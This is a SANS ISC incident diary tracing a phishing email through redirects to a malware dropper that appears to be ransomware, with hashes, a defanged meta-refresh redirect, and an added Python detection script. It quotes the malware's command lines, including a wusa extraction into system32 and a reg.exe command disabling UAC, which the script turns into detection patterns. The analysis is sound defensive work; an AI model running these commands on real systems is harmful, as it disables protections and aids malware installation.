SANS ISC: From Phishing To Ransomware? SANS ISC InfoSec Forums
From Phishing To Ransomware?

On Friday, one of our readers reported a phishing attempt to us (thanks to him!). Usually, such emails are simply part of classic phishing waves that try to steal credentials from victims, but this time it was not a simple phishing. Here is a copy of the email, nicely redacted:

When the victim clicks on the "Review and take action" button, (s)he is redirected to a first website:


This automatically redirects to a second site via an HTTP 301 response:


The following picture is displayed:

Yes, this is just a simple picture, no links are active. So where is the issue? Two seconds after the page has loaded, the browser asks the victim to save a file. The HTML code does indeed contain another redirect:

<meta http-equiv="Refresh" content="2;URL=hxxp://bit[.]ly/2WzXy5t">

The shortened URL links to:


This URL drops a malicious file called "Academics.pdf.exe" (SHA256: ba2598fdd2e5c12e072fbe4c10fcdc6742bace92c0edba42ca4ca7bc195cb813). When I grabbed the file for the first time on Friday, it was unknown on VT. Since then, it has been uploaded by someone else and has a score of 47/71[1]. The file is identified by many AV engines as a banking Trojan but, while performing a basic analysis, I found that the malware drops this picture on the target:

I searched for this email address and found a Tweet by @malwarehunterteam from April 25:

Some actions performed by the malware:

C:\Windows\system32\cmd.exe /c wusa C:\Users\admin\AppData\Local\Temp\ /quiet /extract:C:\Windows\system32\migwiz\ & exit
wusa C:\Users\admin\AppData\Local\Temp\ /quiet /extract:C:\Windows\system32\migwiz\

This drops a crypt.dll in C:\Windows\system32\migwiz\ (SHA256: 856623bc2e40d43960e2309f317f7d2c841650d91f2cd847003e0396299c3f98)[2].

"C:\Windows\System32\WScript.exe" "C:\Users\admin\AppData\Local\Temp\888.vbs"
"C:\Windows\System32\migwiz\migwiz.exe" C:\Windows\System32\cmd.exe /c C:\Windows\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f

I saw many files created on the Desktop with filenames "lock_<randomstring>.<extension>", but the honeypot files were not encrypted. I'm still having a look at the sample.
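As an added example (not code from the diary, the reader or the malware), the following Python pulls the delay and target out of a meta-refresh tag like the one quoted above and matches process command lines against the wusa, reg.exe, WScript and migwiz.exe actions listed above, the way a SIEM rule would. The rule names, the sample event lines and the "payload.msu" file name in the wusa command are constructed for the example.

```python
import re

# Matches a <meta http-equiv="Refresh" content="N;URL=..."> tag; attribute
# order is assumed to be http-equiv first, as in the page quoted in the diary.
META_REFRESH = re.compile(
    r'<meta[^>]*http-equiv\s*=\s*["\']?refresh["\']?[^>]*content\s*=\s*["\']([^"\']+)["\']',
    re.IGNORECASE)

def meta_refresh_target(html):
    """Return (delay_seconds, url) for a meta-refresh redirect, or None."""
    m = META_REFRESH.search(html)
    if not m:
        return None
    delay, _, url = m.group(1).partition(";")
    url = url.strip()
    if url.lower().startswith("url="):
        url = url[4:].strip().strip("'\"")
    return (int(delay), url) if delay.strip().isdigit() else None

# Process command-line patterns derived from the actions listed in the diary.
RULES = [
    ("wusa_extract_to_windows_dir",          # wusa /extract into C:\Windows\...
     re.compile(r'\bwusa(?:\.exe)?\b.*?/extract:\s*"?C:\\Windows\\', re.I)),
    ("uac_disabled_via_reg",                 # EnableLUA set to 0
     re.compile(r'\breg(?:\.exe)?\s+ADD\b.*?Policies\\System\b.*?/v\s+EnableLUA\b.*?/d\s+0\b', re.I)),
    ("script_host_from_user_temp",           # wscript/cscript running a file from %TEMP%
     re.compile(r'\b[wc]script(?:\.exe)?"?\s+"?C:\\Users\\[^\\]+\\AppData\\Local\\Temp\\', re.I)),
    ("migwiz_spawning_cmd",                  # migwiz.exe handed a cmd.exe command line
     re.compile(r'\\migwiz\\migwiz\.exe"?\s+.*?\bcmd\.exe\b', re.I)),
]

def match_rules(cmdline):
    """Return the names of every rule the command line triggers (empty = clean)."""
    return [name for name, rx in RULES if rx.search(cmdline)]

# Constructed sample events modelled on the diary; "payload.msu" stands in
# for the file name that is elided in the original report.
SAMPLE_COMMANDS = [
    r'C:\Windows\system32\cmd.exe /c wusa C:\Users\admin\AppData\Local\Temp\payload.msu /quiet /extract:C:\Windows\system32\migwiz\ & exit',
    r'"C:\Windows\System32\WScript.exe" "C:\Users\admin\AppData\Local\Temp\888.vbs"',
    r'"C:\Windows\System32\migwiz\migwiz.exe" C:\Windows\System32\cmd.exe /c C:\Windows\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f',
    r'C:\Windows\System32\notepad.exe C:\Users\admin\Documents\notes.txt',   # benign control
]

if __name__ == "__main__":
    for cmd in SAMPLE_COMMANDS:
        print(match_rules(cmd) or "clean", "<-", cmd[:60])
```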


Xavier Mertens (@xme)
Senior ISC Handler - Freelance Cyber Security Consultant



May 13th 2019
Thank you Xavier

Amazing info! Many thanks!
